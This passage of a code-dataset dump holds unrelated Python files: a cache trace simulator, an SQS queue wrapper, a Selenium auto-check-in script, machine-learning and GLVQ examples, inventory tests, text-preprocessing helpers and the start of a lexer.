alg, periodSize, throt, file=trace)\r\n\t\r\n\tfor line in lines:\r\n\t\ti += 1\r\n\t\t# print(readReq, period, watchDict, predictDict)\r\n\t\titems = line.split(' ')\r\n\t\treqtype = int(items[0])\r\n\t\tblock = int(items[2])\r\n\r\n\t\tif reqtype == 1:\r\n\t\t\tcontinue\r\n\r\n\t\treadReq += 1\r\n\t\tif status == \"watch\":\r\n\t\t\tssd.update_cache(block)\r\n\t\t\twatchDict = recordReq(block, watchDict)\r\n\t\telse:\r\n\t\t\tpredictDict = recordReq(block, predictDict)\r\n\r\n\t\tif readReq >= periodSize and status == \"watch\":\r\n\t\t\t# print(\"period increase\", readReq, period)\r\n\t\t\treadReq = 0\r\n\t\t\tperiod += 1\r\n\t\t\tstatus = \"predict\"\r\n\t\telif status == \"predict\" and readReq >= predictSize:\r\n\t\t\t\toutputResult(watchDict, predictDict, ssd, predictSize)\r\n\t\t\t\tif predictSize >= periodSize:\r\n\t\t\t\t\tprint(i, \"************************************\", file=trace)\r\n\t\t\t\t\treadReq = 0\r\n\t\t\t\t\tperiod += 1\r\n\t\t\t\t\tstatus = \"watch\"\r\n\t\t\t\t\twatchDict = {}\r\n\t\t\t\t\tpredictDict = {}\r\n\t\t\t\t\tssd = alg(throt)\r\n\t\t\t\t\tpredictSize = init_predictSize(throt)\r\n\t\t\t\telse:\r\n\t\t\t\t\tpredictSize = 10*predictSize\r\n\r\n\r\n\tfin.close()\r\n\tprint(filename, \"finished\")\r\n\r\ndef recordReq(block, blockDict):\r\n\tif block in blockDict:\r\n\t\tblockDict[block] += 1\r\n\telse:\r\n\t\tblockDict[block] = 1\r\n\treturn blockDict\r\n\r\n\r\n\r\n\r\n\r\ndef outputResult(watchDict, predictDict, ssd, period):\r\n\tssdBlocks = list(ssd.get_top_n(len(ssd)))\r\n\t# print(ssdBlocks, file=trace)\r\n\t# print(\"watchdict\", watchDict)\r\n\t# print(\"predictdict\", predictDict)\r\n\treq = 0\r\n\tnum = 0\r\n\tfor block in ssdBlocks:\r\n\t\tif block in predictDict:\r\n\t\t\treq += predictDict[block]\r\n\t\t\t\r\n\r\n\r\n\tl = list(predictDict.items()) \r\n\tl.sort(key=operator.itemgetter(1), reverse=True)\r\n\ti = 0\r\n\tj = 0\r\n\treqIdeal = 0\r\n\r\n\twhile i%s\" % (items[x]['url'], items[x]['title'])\n\n return items\n","sub_path":"bika/lims/browser/client/views/srtemplates.py","file_name":"srtemplates.py","file_ext":"py","file_size_in_byte":2818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} 
+{"seq_id":"340343088","text":"import re\n\nptr = \"¥.(csv|html|py)$\"\nstr = [\"Sample.csv\",\"Sample.exe\",\"test.py\",\"index.html\"]\n\npattern = re.compile(ptr)\nfor valuestr in str:\n\tres = pattern.sub(\".txt\",valuestr)\n\tmrs = \"(変換前)\" + valuestr + \"(変換後)\" + res\n\tprint(mrs)","sub_path":"Python/Python Lesson/Second/Lesson9/Sample12.py","file_name":"Sample12.py","file_ext":"py","file_size_in_byte":243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"645549477","text":"import os\nimport boto3\nfrom threading import Lock\n\n\nclass Sqs():\n __instance = None\n\n def __init__(self, **options):\n self.lock = Lock()\n aws_access_key_id = os.environ['AWS_ACCESS_KEY_ID'] if 'AWS_ACCESS_KEY_ID' in os.environ.keys() else options.get(\n 'aws_access_key_id', '')\n aws_secret_access_key = os.environ['AWS_SECRET_ACCESS_KEY'] if 'AWS_SECRET_ACCESS_KEY' in os.environ.keys() else options.get(\n 'aws_secret_access_key', '')\n region_name = os.environ['AWS_REGION_NAME'] if 'AWS_REGION_NAME' in os.environ.keys() else options.get(\n 'region_name', '')\n endpoint_url = os.environ['SQS_URL'] if 'SQS_URL' in os.environ.keys() else options.get(\n 'endpoint_url', '')\n self.sqs = boto3.resource('sqs',\n aws_access_key_id=aws_access_key_id,\n aws_secret_access_key=aws_secret_access_key,\n region_name=region_name,\n endpoint_url=endpoint_url,\n )\n\n def create_queue(self, queue_name):\n return self.sqs.create_queue(\n QueueName=queue_name\n )\n\n def fetch_queue(self, queue_name):\n return self.sqs.get_queue_by_name(QueueName=queue_name)\n\n def send_message(self, queue_name, messages):\n request = messages if isinstance(messages, list) else [messages]\n queue = self.fetch_queue(queue_name)\n return queue.send_messages(Entries=(request))\n\n def receive_message(self, queue_name):\n queue = self.fetch_queue(queue_name)\n with self.lock:\n r = queue.receive_messages(MaxNumberOfMessages=1)\n if len(r) == 0:\n return None\n else:\n message = r[0]\n body = message.body\n message.delete()\n return body\n","sub_path":"queue_for_thread/sqs.py","file_name":"sqs.py","file_ext":"py","file_size_in_byte":1929,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"593810913","text":"import os\n# 方便延时加载\nimport time\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\n\n# 模拟浏览器打开网站\nchrome_options = Options()\nchrome_options.add_argument('--headless')\nchrome_options.add_argument('--no-sandbox')\nchrome_options.add_argument('--disable-dev-shm-usage')\nbrowser = webdriver.Chrome('/usr/bin/chromedriver', chrome_options=chrome_options)\n#window电脑本地\n# browser = webdriver.Chrome(\"C:\\Program Files (x86)\\Google\\Chrome\\Application\\chromedriver\")\n\n# IamOK自动签到\ndef scut():\n browser.get('https://sso.scut.edu.cn/cas/login?service=https%3A%2F%2Fiamok.scut.edu.cn%2Fcas%2Flogin')\n # 将窗口最大化\n browser.maximize_window()\n # 格式是PEP8自动转的\n # 这里是找到输入框,发送要输入的用户名和密码,模拟登陆\n browser.find_element_by_xpath(\n \"//*[@id='un']\").send_keys(os.environ['SCUT_USER'])\n browser.find_element_by_xpath(\n \"//*[@id='pd']\").send_keys(os.environ['SCUT_PASSWORD'])\n # 在输入用户名和密码之后,点击登陆按钮\n browser.find_element_by_xpath(\"//*[@id='index_login_btn']\").click()\n time.sleep(10)\n try:\n browser.find_element_by_xpath(\"//*[@id='app']/div/div/div[2]/div[3]/button\").click()\n print(\"IamOK签到成功\")\n time.sleep(3)\n saveFile(\"IamOK签到成功!\\n\")\n except NoSuchElementException as e:\n print 
(\"NoSuchElementException!\")\n # js = 'document.getElementById(\"btn\").click();'\n # browser.execute_script(js)\n saveFile(\"IamOK签到代码存在异常\"+str(e))\n\n\n\n# 司徒云自动签到脚本\ndef situyun():\n browser.get('http://situcloud.xyz/auth/login')\n # 将窗口最大化\n browser.maximize_window()\n # 格式是PEP8自动转的\n # 这里是找到输入框,发送要输入的用户名和密码,模拟登陆\n browser.find_element_by_xpath(\n \"//*[@id='email']\").send_keys(os.environ['SITUYUN_USER'])\n browser.find_element_by_xpath(\n \"//*[@id='password']\").send_keys(os.environ['SITUYUN_PASSWORD'])\n # 在输入用户名和密码之后,点击登陆按钮\n browser.find_element_by_xpath(\"//*[@id='app']/section/div/div/div/div[2]/form/div/div[5]/button\").click()\n time.sleep(10)\n try:\n if(\"明日再来\" in browser.find_element_by_xpath(\"//*[@id='checkin-div']\").text):\n saveFile(\"明日再来!\")\n else:\n # browser.find_element_by_xpath(\"//*[@id='checkin-div']/a\").send_keys(Keys.ENTER)\n js = 'document.getElementById(\"checkin-div\").children[0].click();'\n browser.execute_script(js)\n print(\"司徒云打卡成功\")\n time.sleep(3)\n saveFile(\"司徒云签到成功!\")\n except NoSuchElementException as e:\n print (\"NoSuchElementException!\")\n saveFile(\"司徒云签到代码存在异常\"+str(e))\n\n# n3ro自动签到脚本 \ndef n3ro():\n browser.get('https://n3ro.wtf/auth/login')\n # 将窗口最大化\n browser.maximize_window()\n # 格式是PEP8自动转的\n # 这里是找到输入框,发送要输入的用户名和密码,模拟登陆\n browser.find_element_by_xpath(\n \"//*[@id='email']\").send_keys(os.environ['N3RO_USER'])\n browser.find_element_by_xpath(\n \"//*[@id='passwd']\").send_keys(os.environ['N3RO_PASSWORD'])\n # 在输入用户名和密码之后,点击登陆按钮\n browser.find_element_by_xpath(\"//*[@id='login']\").click()\n time.sleep(10)\n try:\n if(\"您今日已签到\" in browser.find_element_by_xpath(\"//*[@class='btn btn-outline-default disabled']\").text):\n saveFile(\"n3ro今日已签到!\\n\")\n else: \n js = 'document.getElementById(\"checkin\").click();'\n browser.execute_script(js)\n print(\"n3ro签到成功\")\n saveFile(\"n3ro签到成功!\\n\")\n time.sleep(3) \n except NoSuchElementException as e:\n print (\"NoSuchElementException!\")\n saveFile(\"n3ro签到代码存在异常\"+str(e)) \n\n# Jikess自动签到脚本\ndef jikess():\n browser.get('https://jikess.com/user/login.php')\n # 将窗口最大化\n browser.maximize_window()\n # 格式是PEP8自动转的\n # 这里是找到输入框,发送要输入的用户名和密码,模拟登陆\n browser.find_element_by_xpath(\n \"//*[@id='email']\").send_keys(os.environ['JIKESS_USER'])\n browser.find_element_by_xpath(\n \"//*[@id='passwd']\").send_keys(os.environ['JIKESS_PASSWORD'])\n # 在输入用户名和密码之后,点击登陆按钮\n browser.find_element_by_xpath(\"//*[@id='login']\").click()\n time.sleep(10)\n try:\n \n if(\"不能签到\" in browser.find_element_by_xpath(\"//*[@class='skin-blue']\").text):\n saveFile(\"Jikess今日已签到!\\n\")\n else: \n js = 'document.getElementById(\"checkin\").click();'\n browser.execute_script(js)\n print(\"Jikess签到成功\")\n saveFile(\"Jikess签到成功!\")\n time.sleep(3) \n except NoSuchElementException as e:\n print (\"NoSuchElementException!\")\n saveFile(\"Jikess签到代码存在异常\"+str(e)) \n\n# Jikess自动签到脚本\ndef jikess2():\n browser.get('https://jikess.com/user/login.php')\n # 将窗口最大化\n browser.maximize_window()\n # 格式是PEP8自动转的\n # 这里是找到输入框,发送要输入的用户名和密码,模拟登陆\n browser.find_element_by_xpath(\n \"//*[@id='email']\").send_keys(os.environ['JIKESS_USER2'])\n browser.find_element_by_xpath(\n \"//*[@id='passwd']\").send_keys(os.environ['JIKESS_PASSWORD2'])\n # 在输入用户名和密码之后,点击登陆按钮\n browser.find_element_by_xpath(\"//*[@id='login']\").click()\n time.sleep(10)\n try:\n \n if(\"不能签到\" in browser.find_element_by_xpath(\"//*[@class='skin-blue']\").text):\n saveFile(\"Jikess2今日已签到!\\n\")\n else: \n js = 'document.getElementById(\"checkin\").click();'\n 
browser.execute_script(js)\n print(\"Jikess2签到成功\")\n saveFile(\"Jikess2签到成功!\")\n time.sleep(3) \n except NoSuchElementException as e:\n print (\"NoSuchElementException!\")\n saveFile(\"Jikess2签到代码存在异常\"+str(e)) \n\n# 写邮件\ndef saveFile(message):\n # 保存email内容\n with open(\"email.txt\", 'a+', encoding=\"utf-8\") as email:\n email.write(message+'\\n')\n \nif __name__ == '__main__':\n #scut()\n \n #jikess()\n jikess2()\n #n3ro()\n # 脚本运行成功,退出浏览器\n browser.quit()\n","sub_path":"autoclick.py","file_name":"autoclick.py","file_ext":"py","file_size_in_byte":6641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"628576268","text":"import numpy as np\nfrom sklearn.svm import LinearSVC, SVC, NuSVC, SVR, LinearSVR, NuSVR\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn import tree\nfrom argparse import ArgumentParser\nfrom pydotplus import graph_from_dot_data\nfrom random import shuffle\nfrom sklearn.model_selection import KFold\n\nx = ArgumentParser(description='Generate Models using Tiered Generation Approach')\nx.add_argument('--model-type', dest='type', action='store', choices=['linear', 'svc', 'nu', 'svr', 'linearsvr', 'nusvr', 'knn', 'tree'],\n help='model generation type to use')\nx.add_argument('--build-mode', dest='iterative', action='store_true', help='automatically choose the best axes configuration', default=False)\nargs = x.parse_args()\n\n\n#\n# Constants\n#\nPERCENT_TRAIN_DIVIDE = 0.8\nEVAL_ROUNDS = int(args.rounds)\nNUM_AXES = -1 if args.iterative else int(args.axes)\nGRAPH_MEASURES = ['v', 'matches', 'seed_1', 'seed_2', 'tr', 'ts', 'place', \"class\"]\n\nintro = '''\nPerforming Tiered Model Generation and Evaluation on Existing Data Set with Params:\n\\tevaluation rounds: {}\n\\tModel Type: {}\n\\tNumber of Axes: {}\n\n'''.format(EVAL_ROUNDS, args.type, NUM_AXES)\n\nprint(intro)\n\ndef generate_models(n_axes, models={}, graph_configs=[]):\n for grph in graph_configs:\n model_candidate = None\n if args.type == 'linear':\n model_candidate = LinearSVC()\n elif args.type == 'svc':\n model_candidate = SVC()\n elif args.type == 'nu':\n model_candidate = NuSVC()\n elif args.type == 'svr':\n model_candidate = SVR()\n elif args.type == 'linearsvr':\n model_candidate = LinearSVR()\n elif args.type == 'nusvr':\n model_candidate = NuSVR()\n elif args.type == 'knn':\n model_candidate = KNeighborsClassifier()\n elif args.type == 'tree':\n model_candidate = DecisionTreeClassifier(criterion='entropy', max_features='auto')\n\n models[grph['label']] = model_candidate\n\n Training_Data = []\n Training_labels = []\n for i in range(0, len(grph[chr(1) + '-data'])):\n for j in range(0, len(grph[chr(1) + '-data'][i])):\n point = []\n for x in range(1, n_axes + 1):\n point.append(grph[chr(x) + '-data'][i][j])\n Training_Data.append(point)\n Training_labels.append(i)\n Training_Data = np.array(Training_Data)\n Training_labels = np.array(Training_labels)\n\n model_candidate.fit(Training_Data, Training_labels)\n\n return models\n\n\ndef get_data():\n data = None\n with open('../data/joined/MF.tredux.joined.web.json', 'r', encoding='utf8') as r:\n from json import loads\n data = loads(r.read())\n\n with open('labels_filled', 'r') as r:\n for line in r:\n name, label = line.strip().split('|')\n for tournament in data:\n for particp_k in tournament:\n if name in tournament[particp_k]:\n tournament[particp_k][name]['label'] = label\n names = set()\n\n master_data = []\n\n for tournament in 
data:\n for particp in tournament.values():\n names |= particp.keys()\n for k in particp:\n entries = {k: v if v is not None else -1 for k, v in particp[k].items() if k in GRAPH_MEASURES + ['label']}\n verification_entry = entries.copy()\n verification_entry['true_label'] = particp[k]['label']\n if particp[k]['label'] == '3':\n master_data.append(entries)\n elif particp[k]['label'] == '2':\n master_data.append(entries)\n elif particp[k]['label'] == '1':\n master_data.append(entries)\n else:\n master_data.append(entries)\n\n return master_data\n\n\nif __name__ == '__main__':\n kf = KFold(n_splits=5, shuffle=True)\n master_data = get_data()\n master_data = np.array(master_data)\n for train_index, test_index in kf.split(master_data):\n pass\n\n\n if args.type == 'tree':\n dd = tree.export_graphviz(model,\n out_file=None,\n feature_names=model['label'].split('|'),\n proportion=True,\n leaves_parallel=False,\n class_names=['local champion', 'national champion', 'international champion', 'olympic representative'],\n filled=True)\n graph = graph_from_dot_data(dd)\n graph.write_pdf('tree_visualization.pdf')\n\n test_and_evaluate(model)","sub_path":"anaylsis/v1/tiered_modelgen.py","file_name":"tiered_modelgen.py","file_ext":"py","file_size_in_byte":4626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"95480442","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nSe encarga de definir las clases para el manejo de archivos\n\"\"\"\n\nimport datetime\nimport os\n\nclass Archivo:\n def __init__(self, ruta):\n \"\"\" Constructor de la clase Archivo \"\"\"\n self.ruta = ruta\n self.peso = os.path.getsize(ruta)\n ts = os.path.getmtime(ruta)\n self.fecha = datetime.datetime.fromtimestamp(ts) # fecha de tipo datetime\n\n def dict(self):\n \"\"\" Regresa la versión en diccionario de un objeto Archivo \"\"\"\n return {\n \"nombre\":self.ruta,\n \"peso\": self.peso,\n \"fecha\": self.fecha.isoformat()\n }\n\n def list(self):\n \"\"\" Regresa la versión en lista de un objeto Archivo \"\"\"\n return [self.ruta, self.peso, self.fecha]\n\n\nclass Carpeta:\n def __init__(self, ruta):\n \"\"\" Constructor de la clase Carpeta \"\"\"\n self.ruta = ruta\n self.peso = 0 # El total de bytes ocupado por lo elementos de la carpeta\n ts = os.path.getmtime(ruta)\n self.fecha = datetime.datetime.fromtimestamp(ts) # fecha de tipo datetime\n\n def obtener_archivos(self, ordenar=\"\"):\n \"\"\"\n Obtiene la lista de archivos de la carpeta\n \"\"\"\n elementos = os.listdir(self.ruta) # Obtiene la lista de nombres de archivos\n if ordenar == \"nombre\":\n elementos.sort()\n elementos = [os.path.join(self.ruta, a) for a in elementos] # Se agrega la ruta\n\n lista_elementos = []\n for elemento in elementos:\n if os.path.isdir(elemento):\n carpeta = Carpeta(elemento)\n self.peso += carpeta.peso # Acumulando los pesos\n lista_elementos.append(carpeta)\n lista_elementos += carpeta.obtener_archivos() # Recursión a nivel objetos\n else:\n archivo = Archivo(elemento)\n # self.peso = self.peso + archivo.peso\n self.peso += archivo.peso # Acumulando los pesos \n lista_elementos.append(archivo)\n\n return lista_elementos # Regresa una lista de objetos Archivo\n\n def dict(self):\n \"\"\" Regresa la versión en diccionario de un objeto Archivo \"\"\"\n return {\n \"nombre\":self.ruta,\n \"peso\": self.peso,\n \"fecha\": self.fecha.isoformat()\n }\n\n def list(self):\n \"\"\" Regresa la versión en lista de un objeto Archivo \"\"\"\n return [self.ruta, self.peso, 
self.fecha]\n\n\n\n","sub_path":"Sesion-07/Ejemplo-02/modelo.py","file_name":"modelo.py","file_ext":"py","file_size_in_byte":2487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"498677706","text":"def dictionary_generator(input_list, pad_flag=True, eos_flag=True, oov_flag=True):\n index_flag = 0\n result_dict = dict()\n if pad_flag is True:\n result_dict['P***A***D'] = index_flag\n index_flag += 1\n if eos_flag is True:\n result_dict['E***O***S'] = index_flag\n index_flag += 1\n if oov_flag is True:\n result_dict['O***O***V'] = index_flag\n index_flag += 1\n\n for one_entry in input_list:\n result_dict[one_entry] = index_flag\n index_flag += 1\n inverse_result_dict = {v: k for k, v in result_dict.items()}\n return result_dict, inverse_result_dict\n\n\ndef data_indexer(input_list, indexing_dict):\n result_list = list()\n for one_entry in input_list:\n if one_entry in indexing_dict:\n result_list.append(indexing_dict[one_entry])\n else:\n result_list.append(indexing_dict['O***O***V'])\n return result_list","sub_path":"model/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"75298210","text":"import pytest\n\nfrom ereuse_devicehub.client import UserClient\nfrom ereuse_devicehub.db import db\nfrom ereuse_devicehub.devicehub import Devicehub\nfrom ereuse_devicehub.resources.device.models import Desktop, Device, Laptop, Microtower, \\\n SolidStateDrive\nfrom ereuse_devicehub.resources.inventory import Filters, Inventory, Sorting\nfrom teal.utils import compiled\n\n\n@pytest.mark.usefixtures('app_context')\ndef test_inventory_filters():\n schema = Filters()\n q = schema.load({\n 'type': ['Computer', 'Laptop'],\n 'manufacturer': 'Dell',\n 'rating': {\n 'rating': [3, 6],\n 'appearance': [2, 4]\n },\n 'tag': {\n 'id': ['bcn-', 'activa-02']\n }\n })\n s, params = compiled(Device, q)\n # Order between query clauses can change\n assert '(device.type IN (%(type_1)s, %(type_2)s, %(type_3)s, %(type_4)s, ' \\\n '%(type_5)s, %(type_6)s) OR device.type IN (%(type_7)s))' in s\n assert 'device.manufacturer ILIKE %(manufacturer_1)s' in s\n assert 'rate.rating BETWEEN %(rating_1)s AND %(rating_2)s' in s\n assert 'rate.appearance BETWEEN %(appearance_1)s AND %(appearance_2)s' in s\n assert '(tag.id ILIKE %(id_1)s OR tag.id ILIKE %(id_2)s)' in s\n\n # type_x can be assigned at different values\n # ex: type_1 can be 'Desktop' in one execution but the next one 'Laptop'\n assert set(params.keys()) == {\n 'id_1',\n 'manufacturer_1',\n 'type_4',\n 'type_3',\n 'id_2',\n 'type_1',\n 'rating_1',\n 'type_5',\n 'appearance_2',\n 'type_6',\n 'type_7',\n 'appearance_1',\n 'rating_2',\n 'type_2'\n }\n assert set(params.values()) == {\n 'bcn-%',\n 'Dell%',\n 'Laptop',\n 'Server',\n 'activa-02%',\n 'Computer',\n 3.0,\n 'Microtower',\n 4.0,\n 'Netbook',\n 'Laptop',\n 2.0,\n 6.0,\n 'Desktop'\n }\n\n\n@pytest.mark.usefixtures('app_context')\ndef test_inventory_sort():\n schema = Sorting()\n r = next(schema.load({'created': True}))\n assert str(r) == 'device.created ASC'\n\n\n@pytest.fixture()\ndef inventory_query_dummy(app: Devicehub):\n with app.app_context():\n db.session.add_all(( # The order matters ;-)\n Desktop(serial_number='s1', model='ml1', manufacturer='mr1'),\n Laptop(serial_number='s3', model='ml3', manufacturer='mr3'),\n Microtower(serial_number='s2', model='ml2', manufacturer='mr2'),\n SolidStateDrive(serial_number='s4', model='ml4', 
manufacturer='mr4')\n ))\n db.session.commit()\n\n\n@pytest.mark.usefixtures('inventory_query_dummy')\ndef test_inventory_query_no_filters(user: UserClient):\n i, _ = user.get(res=Inventory)\n assert tuple(d['type'] for d in i['devices']) == (\n 'SolidStateDrive', 'Microtower', 'Laptop', 'Desktop'\n )\n\n\n@pytest.mark.usefixtures('inventory_query_dummy')\ndef test_inventory_query_filter_type(user: UserClient):\n i, _ = user.get(res=Inventory, query=[('filter', {'type': ['Computer', 'Microtower']})])\n assert tuple(d['type'] for d in i['devices']) == ('Microtower', 'Laptop', 'Desktop')\n\n\n@pytest.mark.usefixtures('inventory_query_dummy')\ndef test_inventory_query_filter_sort(user: UserClient):\n i, _ = user.get(res=Inventory, query=[\n ('sort', {'created': Sorting.ASCENDING}),\n ('filter', {'type': ['Computer']})\n ])\n assert tuple(d['type'] for d in i['devices']) == ('Desktop', 'Laptop', 'Microtower')\n","sub_path":"tests/test_inventory.py","file_name":"test_inventory.py","file_ext":"py","file_size_in_byte":3523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"609156577","text":"import copy\nimport random\nfrom typing import List, Dict\n\n\ndef add_pad_unk(embeddings: Dict, pad_token: str, unk_token: str):\n\n embedding_size = len(next(iter(embeddings.values())))\n\n # pad token\n if pad_token not in embeddings:\n embeddings[pad_token] = (\n [random.gauss(0, 1) for _ in range(embedding_size)])\n\n # unk token\n if unk_token not in embeddings:\n embeddings[unk_token] = (\n [random.gauss(0, 1) for _ in range(embedding_size)])\n\n\ndef filter_unused_word(embeddings: Dict, sentences: List[List[str]]):\n\n # used words\n used_words = set()\n for s in sentences:\n used_words.update(s)\n\n # build word_lookup and word_embedding\n word_lookup = []\n word_embedding = []\n\n for w in used_words:\n word_lookup.append(w)\n word_embedding.append(embeddings[w])\n\n return word_lookup, word_embedding\n\n\ndef _cut_and_pad(s: List[str], max_length: int, pad_token: str):\n\n s_len = len(s)\n\n if s_len < max_length:\n new_s = s + [pad_token] * (max_length - s_len)\n elif s_len > max_length:\n new_s = s[0: max_length]\n else:\n new_s = s\n\n return new_s\n\n\ndef _low_case(s: List[str]):\n\n cases = []\n lowed = []\n\n for token in s:\n if token.isalpha():\n if token.isupper():\n cases.append(0) # upper: 0\n elif token.istitle():\n cases.append(1) # title: 1\n elif token.islower():\n cases.append(2) # lower: 2\n else:\n cases.append(3) # hybird: 3\n else:\n cases.append(3) # hybird\n\n lowed.append(token.lower())\n\n return lowed, cases\n\n\ndef _replace_oov(s: List[str], embeddings: Dict, unk_token: str):\n\n new_s = []\n\n for token in s:\n if token in embeddings:\n new_s.append(token)\n else:\n new_s.append(unk_token)\n\n return new_s\n\n\ndef adjust_sentence(sentences: List[List[str]],\n max_length: int, pad_token: str,\n embeddings: Dict, unk_token: str):\n\n new_sentences = []\n case_seqs = []\n\n for s in sentences:\n\n # cut and pad\n cutted = _cut_and_pad(s, max_length, pad_token)\n\n # low case\n lowed, case_seq = _low_case(cutted)\n\n # replace_oov\n new_s = _replace_oov(lowed, embeddings, unk_token)\n\n # append to new_sentences\n new_sentences.append(new_s)\n case_seqs.append(case_seq)\n\n return new_sentences, case_seqs\n","sub_path":"etype-uncased-nomc/adjust/sentence.py","file_name":"sentence.py","file_ext":"py","file_size_in_byte":2513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} 
+{"seq_id":"592415681","text":"\"\"\"ProtoTorch GLVQ example using 2D Iris data.\"\"\"\n\nimport numpy as np\nimport torch\nfrom matplotlib import pyplot as plt\nfrom prototorch.functions.competitions import wtac\nfrom prototorch.functions.distances import euclidean_distance\nfrom prototorch.modules.losses import GLVQLoss\nfrom prototorch.modules.prototypes import Prototypes1D\nfrom sklearn.datasets import load_iris\nfrom sklearn.preprocessing import StandardScaler\nfrom torchinfo import summary\n\n# Prepare and preprocess the data\nscaler = StandardScaler()\nx_train, y_train = load_iris(return_X_y=True)\nx_train = x_train[:, [0, 2]]\nscaler.fit(x_train)\nx_train = scaler.transform(x_train)\n\n\n# Define the GLVQ model\nclass Model(torch.nn.Module):\n def __init__(self):\n \"\"\"GLVQ model for training on 2D Iris data.\"\"\"\n super().__init__()\n self.proto_layer = Prototypes1D(\n input_dim=2,\n prototypes_per_class=3,\n nclasses=3,\n prototype_initializer=\"stratified_random\",\n data=[x_train, y_train])\n\n def forward(self, x):\n protos = self.proto_layer.prototypes\n plabels = self.proto_layer.prototype_labels\n dis = euclidean_distance(x, protos)\n return dis, plabels\n\n\n# Build the GLVQ model\nmodel = Model()\n\n# Print summary using torchinfo (might be buggy/incorrect)\nprint(summary(model))\n\n# Optimize using SGD optimizer from `torch.optim`\noptimizer = torch.optim.SGD(model.parameters(), lr=0.01)\ncriterion = GLVQLoss(squashing=\"sigmoid_beta\", beta=10)\n\nx_in = torch.Tensor(x_train)\ny_in = torch.Tensor(y_train)\n\n# Training loop\ntitle = \"Prototype Visualization\"\nfig = plt.figure(title)\nfor epoch in range(70):\n # Compute loss\n dis, plabels = model(x_in)\n loss = criterion([dis, plabels], y_in)\n with torch.no_grad():\n pred = wtac(dis, plabels)\n correct = pred.eq(y_in.view_as(pred)).sum().item()\n acc = 100. 
* correct / len(x_train)\n print(f\"Epoch: {epoch + 1:03d} Loss: {loss.item():05.02f} Acc: {acc:05.02f}%\")\n\n # Take a gradient descent step\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n # Get the prototypes form the model\n protos = model.proto_layer.prototypes.data.numpy()\n if np.isnan(np.sum(protos)):\n print(\"Stopping training because of `nan` in prototypes.\")\n break\n\n # Visualize the data and the prototypes\n ax = fig.gca()\n ax.cla()\n ax.set_title(title)\n ax.set_xlabel(\"Data dimension 1\")\n ax.set_ylabel(\"Data dimension 2\")\n cmap = \"viridis\"\n ax.scatter(x_train[:, 0], x_train[:, 1], c=y_train, edgecolor=\"k\")\n ax.scatter(protos[:, 0],\n protos[:, 1],\n c=plabels,\n cmap=cmap,\n edgecolor=\"k\",\n marker=\"D\",\n s=50)\n\n # Paint decision regions\n x = np.vstack((x_train, protos))\n x_min, x_max = x[:, 0].min() - 1, x[:, 0].max() + 1\n y_min, y_max = x[:, 1].min() - 1, x[:, 1].max() + 1\n xx, yy = np.meshgrid(np.arange(x_min, x_max, 1 / 50),\n np.arange(y_min, y_max, 1 / 50))\n mesh_input = np.c_[xx.ravel(), yy.ravel()]\n\n torch_input = torch.Tensor(mesh_input)\n d = model(torch_input)[0]\n w_indices = torch.argmin(d, dim=1)\n y_pred = torch.index_select(plabels, 0, w_indices)\n y_pred = y_pred.reshape(xx.shape)\n\n # Plot voronoi regions\n ax.contourf(xx, yy, y_pred, cmap=cmap, alpha=0.35)\n\n ax.set_xlim(left=x_min + 0, right=x_max - 0)\n ax.set_ylim(bottom=y_min + 0, top=y_max - 0)\n\n plt.pause(0.1)\n","sub_path":"examples/glvq_iris.py","file_name":"glvq_iris.py","file_ext":"py","file_size_in_byte":3521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"593785571","text":"import sys\nimport re\nfrom enum import Enum\n\nre.ASCII\n\n\nclass MplSyntaxError(Exception):\n pass\n\n\nclass Tokens(Enum):\n KEYWORD = 1\n SEPARATOR = 2\n LITERAL = 3\n IDENTIFIER = 4\n OPERATOR = 5\n INDENTATION = 6\n\n\nkeywords = ['int', 'float', 'double', 'array', 'bool', 'return', 'class']\nseparators = ['{', '}', '<', '>', ',']\noperators = ['=']\nliterals = r'^([0-9]+|\".*\")$'\nidentifiers = r'^(\\w+)$'\n\n\nsymbol_table = []\n\ndef process_word(word):\n if word in keywords:\n return (Tokens.KEYWORD, word)\n if word in separators:\n return (Tokens.SEPARATOR, word)\n if word in operators:\n return (Tokens.OPERATOR, word)\n\n m = re.match(literals, word)\n if m:\n return (Tokens.LITERAL, m.group(1))\n m = re.match(identifiers, word)\n if m:\n return (Tokens.IDENTIFIER, m.group(1))\n\n return None\n\n\ndef process_sub_word(word, index):\n valid_tokens = []\n subword = ''\n for i in range(index, len(word)):\n subword += word[i]\n token = process_word(subword)\n if token:\n valid_tokens.append((i, token))\n\n return valid_tokens\n\n\ndef process_leading_spaces(line, index):\n space_count = len(line) - len(line.lstrip())\n if space_count % 4 != 0:\n raise MplSyntaxError('Invalid space count {} on line {}:\\n{}'\n .format(space_count, index, line))\n indent_count = space_count / 4\n return indent_count\n\n\ndef process_line(line, line_index):\n if len(line.strip()) == 0:\n return\n\n indent_count = process_leading_spaces(line, line_index)\n if indent_count > 0:\n symbol_table.append((Tokens.INDENTATION, indent_count))\n words = line.split()\n for word in words:\n token = process_word(word)\n if token:\n symbol_table.append(token)\n else:\n index = 0\n while index < len(word):\n tokens = process_sub_word(word, index)\n if tokens:\n index, token = tokens[-1]\n index += 1\n symbol_table.append(token)\n else:\n 
